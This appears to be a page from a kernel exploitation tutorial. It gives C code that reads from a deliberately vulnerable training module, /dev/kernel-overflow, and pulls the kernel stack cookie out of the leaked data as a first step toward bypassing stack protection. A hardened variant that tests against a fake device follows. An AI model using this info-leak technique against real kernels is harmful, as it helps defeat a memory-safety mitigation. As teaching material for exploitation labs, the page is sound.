Breaking Bits
Interacting with Kernel Modules

Character devices

A kernel module that wants to talk to userspace usually registers a character device and exposes it as a node under /dev. From userspace there is nothing special about it: open(2) the node, then read(2) and write(2) on the returned descriptor exactly as you would with an ordinary file. The client below opens /dev/kernel-overflow, reads a buffer back from the module, dumps it one 8-byte word at a time and pulls the kernel stack cookie out of the returned data; the next page, on kernel stack cookies, builds on that value.

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define KERN_MODULE "/dev/kernel-overflow"
#define BUF_SIZE    256     /* bytes requested per read(); assumed value, the original left it undefined */
#define WORD_SIZE   8       /* sizeof(unsigned long) on x86-64 */

unsigned long do_read(int fd);

/* Print an error message and bail out */
static void exit_and_log(const char *msg)
{
    fprintf(stderr, "%s\n", msg);
    exit(-1);
}

int main(void)
{
    /*
     * Interacting with this kernel module is easy:
     * just treat it like a file.
     */
    int fd;
    unsigned long stack_cookie;

    fd = open(KERN_MODULE, O_RDWR);
    if (fd < 0) exit_and_log("Failed to open " KERN_MODULE);

    stack_cookie = do_read(fd);
    printf("stack cookie\t: %lX\n", stack_cookie);

    close(fd);
    return 0;
}

unsigned long do_read(int fd)
{
    ssize_t bytes_read;
    unsigned long *buf = NULL;
    unsigned long stack_cookie;
    unsigned int cookie_offset = 16;    /* word index of the cookie in the data the module hands back */

    buf = malloc(BUF_SIZE);
    if (buf == NULL) exit_and_log("Failed to malloc");
    memset(buf, '\x00', BUF_SIZE);

    bytes_read = read(fd, buf, BUF_SIZE);
    if (bytes_read < 0) exit_and_log("Failed to read from the module");

    /*
     * For every 8 bytes read, print them
     */
    for (int i = 0; i < (BUF_SIZE / WORD_SIZE); i++)
    {
        printf("buf + 0x%X\t: %lX\n", (unsigned int)(i * WORD_SIZE), buf[i]);
    }

    stack_cookie = buf[cookie_offset];
    free(buf);

    return stack_cookie;
}
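The client above trusts two things it never checks: that whatever is at the /dev path is really the driver, and that a single read(2) filled the whole buffer before buf[16] is taken as the cookie. The following standalone C program is an added example, not code from the Breaking Bits page or its module, that closes both gaps: it uses fstat(2) to confirm the descriptor is a character device, loops on read(2) so a short read cannot leave zeroed heap memory where the leaked word is expected, and refuses to return a word the device never filled. Because no kernel module is loaded here, a temporary regular file carrying a constructed 256-byte image stands in for /dev/kernel-overflow; the 0x1122334455667700 marker at word 16, the 256-byte BUF_SIZE and the helper names (is_char_device, read_full, read_words, word_at, make_fake_device) are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_SIZE  256   /* assumed read size, same assumption as the page's client */
#define WORD_SIZE 8     /* sizeof(unsigned long) on x86-64 */
#define NWORDS    (BUF_SIZE / WORD_SIZE)
#define MARKER    0x1122334455667700UL   /* constructed stand-in for the leaked cookie */

/* 1 if fd is a character device, 0 if not, -1 if fstat() fails.
 * If something other than the driver (a regular file, a symlink to one) sits
 * at the expected /dev path, read() still "works" but returns whatever was
 * planted there, so check the node type before trusting the bytes. */
int is_char_device(int fd)
{
    struct stat st;
    if (fstat(fd, &st) < 0) return -1;
    return S_ISCHR(st.st_mode) ? 1 : 0;
}

/* read() may hand back fewer bytes than requested; keep reading until the
 * buffer is full or the descriptor has nothing more. Returns bytes read or -1. */
ssize_t read_full(int fd, void *buf, size_t len)
{
    size_t got = 0;
    while (got < len) {
        ssize_t n = read(fd, (char *)buf + got, len - got);
        if (n < 0) return -1;
        if (n == 0) break;                    /* EOF: the driver stopped producing data */
        got += (size_t)n;
    }
    return (ssize_t)got;
}

/* Fill buf with up to nwords 8-byte words from fd. Returns how many words were
 * completely filled (a trailing partial word is not counted), or -1 on error. */
ssize_t read_words(int fd, unsigned long *buf, size_t nwords)
{
    memset(buf, 0, nwords * WORD_SIZE);
    ssize_t n = read_full(fd, buf, nwords * WORD_SIZE);
    if (n < 0) return -1;
    return n / WORD_SIZE;
}

/* Extract word idx, but only if the device actually filled it; otherwise the
 * caller would mistake our own zeroed memory for a leaked kernel value. */
int word_at(const unsigned long *buf, size_t nwords_read, unsigned int idx, unsigned long *out)
{
    if (idx >= nwords_read) return -1;
    *out = buf[idx];
    return 0;
}

/* Same dump format as the page's do_read(), one 8-byte word per line. */
void dump_words(const unsigned long *buf, size_t nwords)
{
    for (size_t i = 0; i < nwords; i++)
        printf("buf + 0x%zX\t: %lX\n", i * WORD_SIZE, buf[i]);
}

/* Stand-in for /dev/kernel-overflow when no module is loaded: a temp file
 * holding a constructed 256-byte image with MARKER at word 16. Returns the
 * open descriptor (rewound to offset 0) and writes the path to path_out. */
int make_fake_device(char *path_out, size_t path_len)
{
    char tmpl[] = "/tmp/fake-kernel-overflow-XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;

    unsigned long image[NWORDS];
    for (size_t i = 0; i < NWORDS; i++)
        image[i] = 0x4141414141414141UL + i;  /* constructed filler, distinct per word */
    image[16] = MARKER;

    if (write(fd, image, sizeof image) != (ssize_t)sizeof image ||
        lseek(fd, 0, SEEK_SET) < 0) {
        close(fd);
        unlink(tmpl);
        return -1;
    }
    snprintf(path_out, path_len, "%s", tmpl);
    return fd;
}

int main(void)
{
    char path[64];
    unsigned long words[NWORDS], cookie;

    int fd = make_fake_device(path, sizeof path);
    if (fd < 0) { perror("make_fake_device"); return 1; }

    printf("%s is %sa character device\n", path, is_char_device(fd) == 1 ? "" : "NOT ");

    ssize_t n = read_words(fd, words, NWORDS);
    if (n < 0) { perror("read"); return 1; }
    dump_words(words, (size_t)n);

    if (word_at(words, (size_t)n, 16, &cookie) == 0)
        printf("word 16\t\t: %lX\n", cookie);
    else
        printf("device returned only %zd words, word 16 not available\n", n);

    close(fd);
    unlink(path);
    return 0;
}
```

To run this against the real node, replace make_fake_device() with open("/dev/kernel-overflow", O_RDWR) and expect is_char_device() to report 1; if it reports 0, something other than the driver is sitting at that path and the bytes you are reading are not kernel memory.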

Last updated 3 years ago
